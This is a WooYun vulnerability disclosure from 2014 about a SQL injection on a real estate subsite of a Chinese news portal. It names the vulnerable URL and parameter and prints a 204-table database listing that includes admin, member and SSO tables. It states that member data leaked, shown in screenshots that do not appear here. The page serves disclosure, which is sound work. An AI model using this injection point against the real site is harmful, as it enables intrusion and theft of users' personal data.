当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-075798

漏洞标题:燕赵都市网某分站sql注入漏洞

相关厂商:燕都网

漏洞作者: 新生

提交时间:2014-09-11 17:36

修复时间:2014-10-26 17:38

公开时间:2014-10-26 17:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-09-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-10-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

sql注入漏洞,泄露大量会员信息

详细说明:

注入点
http://loupan.house.yzdsb.com.cn/?a=search&f=&s=&p=&e=&t=&r=&h=&d=&w= f=

dbs.jpg


Database: inchyzdsbdb
[204 tables]
+------------------------------------+
| inch_ask_answer |
| inch_ask_askcat |
| inch_ask_question |
| inch_ask_qutags |
| inch_ask_tags |
| inch_ask_tpdata |
| inch_ask_tpjiangpin |
| inch_ask_tpzuopin |
| inch_ask_zjt |
| inch_ask_ztq |
| inch_cms_admin |
| inch_cms_admin_panel |
| inch_cms_admin_role |
| inch_cms_admin_role_priv |
| inch_cms_announce |
| inch_cms_attachment |
| inch_cms_attachment_index |
| inch_cms_badword |
| inch_cms_bbs |
| inch_cms_bbs_data |
| inch_cms_block |
| inch_cms_block_history |
| inch_cms_block_priv |
| inch_cms_cache |
| inch_cms_category |
| inch_cms_category_priv |
| inch_cms_collection_content |
| inch_cms_collection_history |
| inch_cms_collection_node |
| inch_cms_collection_program |
| inch_cms_comment |
| inch_cms_comment_check |
| inch_cms_comment_data_1 |
| inch_cms_comment_setting |
| inch_cms_comment_table |
| inch_cms_content_check |
| inch_cms_copyfrom |
| inch_cms_datacall |
| inch_cms_dbsource |
| inch_cms_download |
| inch_cms_download_data |
| inch_cms_downservers |
| inch_cms_duobiaoti |
| inch_cms_duobiaoti_data |
| inch_cms_extend_setting |
| inch_cms_favorite |
| inch_cms_form_biaodan_jiahe |
| inch_cms_form_ddd |
| inch_cms_form_diaocha2014 |
| inch_cms_form_diaocha3 |
| inch_cms_form_diaochaweijuan |
| inch_cms_form_hengdahaoshengyin |
| inch_cms_form_jidongche1 |
| inch_cms_form_jjysddc |
| inch_cms_form_jxss |
| inch_cms_form_loushiditu |
| inch_cms_form_milanchuntianbaoming |
| inch_cms_form_mlzj |
| inch_cms_form_qzrjfhxss |
| inch_cms_form_tatantuangou |
| inch_cms_form_tejiafang |
| inch_cms_form_xxdashi |
| inch_cms_form_xzldiaocha |
| inch_cms_form_zhishu |
| inch_cms_hits |
| inch_cms_ipbanned |
| inch_cms_keylink |
| inch_cms_link |
| inch_cms_linkage |
| inch_cms_log |
| inch_cms_member |
| inch_cms_member_agent |
| inch_cms_member_detail |
| inch_cms_member_group |
| inch_cms_member_menu |
| inch_cms_member_verify |
| inch_cms_member_vip |
| inch_cms_menu |
| inch_cms_message |
| inch_cms_message_data |
| inch_cms_message_group |
| inch_cms_model |
| inch_cms_model_field |
| inch_cms_module |
| inch_cms_mood |
| inch_cms_news |
| inch_cms_news_data |
| inch_cms_page |
| inch_cms_pay_account |
| inch_cms_pay_payment |
| inch_cms_pay_spend |
| inch_cms_picture |
| inch_cms_picture_data |
| inch_cms_plugin |
| inch_cms_plugin_var |
| inch_cms_position |
| inch_cms_position_data |
| inch_cms_poster |
| inch_cms_poster_201210 |
| inch_cms_poster_201211 |
| inch_cms_poster_201212 |
| inch_cms_poster_201301 |
| inch_cms_poster_201304 |
| inch_cms_poster_201306 |
| inch_cms_poster_201307 |
| inch_cms_poster_201308 |
| inch_cms_poster_201309 |
| inch_cms_poster_201310 |
| inch_cms_poster_201311 |
| inch_cms_poster_201312 |
| inch_cms_poster_201401 |
| inch_cms_poster_201403 |
| inch_cms_poster_201404 |
| inch_cms_poster_201406 |
| inch_cms_poster_201408 |
| inch_cms_poster_space |
| inch_cms_queue |
| inch_cms_release_point |
| inch_cms_search |
| inch_cms_search_keyword |
| inch_cms_session |
| inch_cms_site |
| inch_cms_sms_report |
| inch_cms_special |
| inch_cms_special_c_data |
| inch_cms_special_content |
| inch_cms_sphinx_counter |
| inch_cms_sso_admin |
| inch_cms_sso_applications |
| inch_cms_sso_members |
| inch_cms_sso_messagequeue |
| inch_cms_sso_session |
| inch_cms_sso_settings |
| inch_cms_tag |
| inch_cms_template_bak |
| inch_cms_times |
| inch_cms_topic |
| inch_cms_topic_data |
| inch_cms_type |
| inch_cms_urlrule |
| inch_cms_urlrule_bak28 |
| inch_cms_vote_data |
| inch_cms_vote_option |
| inch_cms_vote_subject |
| inch_cms_wap |
| inch_cms_wap_type |
| inch_cms_wj |
| inch_cms_workflow |
| inch_cms_zhibo |
| inch_cms_zhibo_data |
| inch_esf_attachment |
| inch_esf_estate |
| inch_esf_estate_image |
| inch_esf_house |
| inch_esf_sms |
| inch_esf_zu |
| inch_jiaju_activity |
| inch_jiaju_brand |
| inch_jiaju_brandtype |
| inch_jiaju_signup |
| inch_kft_intention |
| inch_kft_product |
| inch_kft_road |
| inch_kft_signup |
| inch_lp_estate |
| inch_lp_estate_autoupdata |
| inch_lp_estate_averageprice |
| inch_lp_estate_brand |
| inch_lp_estate_build |
| inch_lp_estate_clinch |
| inch_lp_estate_clinch_month |
| inch_lp_estate_clinch_week |
| inch_lp_estate_content |
| inch_lp_estate_content_bak |
| inch_lp_estate_developer |
| inch_lp_estate_distance |
| inch_lp_estate_duibi |
| inch_lp_estate_edifice |
| inch_lp_estate_hot |
| inch_lp_estate_image |
| inch_lp_estate_impression |
| inch_lp_estate_invester |
| inch_lp_estate_mark |
| inch_lp_estate_mark_distance |
| inch_lp_estate_params |
| inch_lp_estate_params_bak |
| inch_lp_estate_position |
| inch_lp_estate_position_data |
| inch_lp_estate_price |
| inch_lp_estate_price_month |
| inch_lp_estate_price_week |
| inch_lp_estate_property |
| inch_lp_estate_sign |
| inch_lp_estate_status |
| inch_lp_estate_subcity |
| inch_lp_estate_sync |
| inch_lp_estate_tag |
| inch_lp_estate_tip |
| inch_lp_estate_unit |
| sync_user_test |
| sys_t_param |
| sys_t_user |
| user |
| weixinchoujiang |
+------------------------------------+

inch_cms_admin表.jpg

漏洞证明:

inch_cms_admin数据.jpg

inch_cms_member数据.jpg

inch_cms_sso_members数据.jpg

修复方案:

版权声明:转载请注明来源 新生@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝